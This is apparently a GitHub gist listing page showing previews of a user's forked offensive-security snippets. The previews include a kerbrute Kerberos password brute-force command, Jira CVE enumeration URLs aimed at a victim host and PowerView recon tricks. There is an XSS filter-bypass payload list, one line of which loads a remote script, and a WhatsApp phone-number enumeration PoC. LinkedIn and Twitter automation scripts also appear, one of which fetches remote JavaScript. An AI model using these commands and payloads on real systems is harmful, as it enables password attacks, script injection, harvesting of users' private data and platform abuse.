With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
rajivraj
/ kerberos_attacks_cheatsheet.md
Created
September 21, 2021 06:22
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
rajivraj
/ st8out.sh
Created
September 6, 2021 08:36
— forked from dwisiswant0/st8out.sh
St8out - Extra one-liner for reconnaissance
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ##### | |
| # | |
| # St8out - Extra one-liner for reconnaissance | |
| # | |
| # Usage: ./st8out.sh target.com | |
| # | |
| # Resources: | |
| # - https://github.com/j3ssie/metabigor |
rajivraj
/ Jira bug-exploit
Created
March 29, 2021 07:52
— forked from 0x240x23elu/Jira bug-exploit
Jira Bug CVE-2019-8449,CVE-2019-8451,CVE-2019-8451,cve-2018-20824,cve-2020-14179,cve-2020-14181,CVE-2018-5230
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cve-2019-8449 | |
| The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. | |
| https://jira.atlassian.com/browse/JRASERVER-69796 | |
| https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true | |
| ===================================================================================================================================== |
rajivraj
/ PowerView-3.0-tricks.ps1
Created
September 3, 2020 08:35
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
rajivraj
/ xxsfilterbypass.lst
Created
May 20, 2020 09:12
— forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
rajivraj
/ whatsapp_phone_enumerator_floated_div.js
Created
January 4, 2019 18:40
PoC WhatsApp enumeration of phonenumbers, profile pics, about texts and online statuses (floated div)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /****** I've created a Chrome extension from this script, take a look at https://github.com/LoranKloeze/WhatsAllApp ********/ | |
| /******************** Keep in mind: this script is frozen. Check the url mentioned above. **********************************/ | |
| /******************** Keep in mind: this script is frozen. Check the url mentioned above. **********************************/ | |
| /******************** Keep in mind: this script is frozen. Check the url mentioned above. **********************************/ | |
| /******************** Keep in mind: this script is frozen. Check the url mentioned above. **********************************/ | |
| /******************** Keep in mind: this script is frozen. Check the url mentioned above. **********************************/ | |
| /******************** Keep in mind: this script is frozen. Check the url mentioned above. **********************************/ | |
| // Was this script of any use for you? Please consider a donation. It has taken me a lot of time to figure this |
rajivraj
/ http-components.csv
Created
August 13, 2018 13:49
— forked from achillean/http-components.csv
Sample output from the Shodan CLI running: shodan stats --facets http.component:100,port:20 http-components http
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Query | http | |||
|---|---|---|---|---|
| http.component | port | |||
| jQuery | 1250676 | 80 | 56553138 | |
| Zepto | 483672 | 7547 | 50655465 | |
| PHP | 266668 | 443 | 26476433 | |
| Twitter Bootstrap | 255045 | 4567 | 11633390 | |
| Google Font API | 211921 | 8080 | 8631875 | |
| WordPress | 139645 | 1900 | 4540344 | |
| Font Awesome | 133483 | 49152 | 3028740 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| a = setInterval(function () { | |
| window.scrollTo(0,document.body.scrollHeight); | |
| $('.not-following .user-actions-follow-button.js-follow-btn').click(); | |
| }, 3000); | |
| var mutual = 10; // You can change this number if you do not wish to send invites to accounts that has a number of mutual connexions below this number | |
| var blockNoPhoto = 1; // Don't send invitations to accounts without a profile picture (1 to activate, 0 to deactivate) | |
| var occKeywords = ""; // Add only accounts with a specific keyword in the occupation title (Empty "" to add all) Ex: Recruter,CEO,PHP,Programmer | |
| var dismiss = 0; // Dismiss contacts that where not added (1 to activate, 0 to deactivate) | |
| $.getScript('https://www.webiummedia.com/linkedin.js?v=2'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| if (occKeywords==""){ | |
| var occKeywords = "A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z"; | |
| } | |
| // Sleep the execution in order to be less agressive | |
| function sleep(ms) {return new Promise(resolve => setTimeout(resolve, ms));} | |
| // Scroll up then down to trigger the contact refresh | |
| function scrollDown() { | |
| // scrolling up |
rajivraj
/ gist:d83af1384b06daded99f39280bd9e0b5
Created
September 9, 2017 07:02
linkedin Auto connect
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var inviter = {} || inviter; | |
| inviter.userList = []; | |
| inviter.className = 'button-secondary-small'; | |
| inviter.refresh = function() { | |
| window.scrollTo(0, document.body.scrollHeight); | |
| window.scrollTo(document.body.scrollHeight, 0); | |
| window.scrollTo(0, document.body.scrollHeight); | |
| }; |
NewerOlder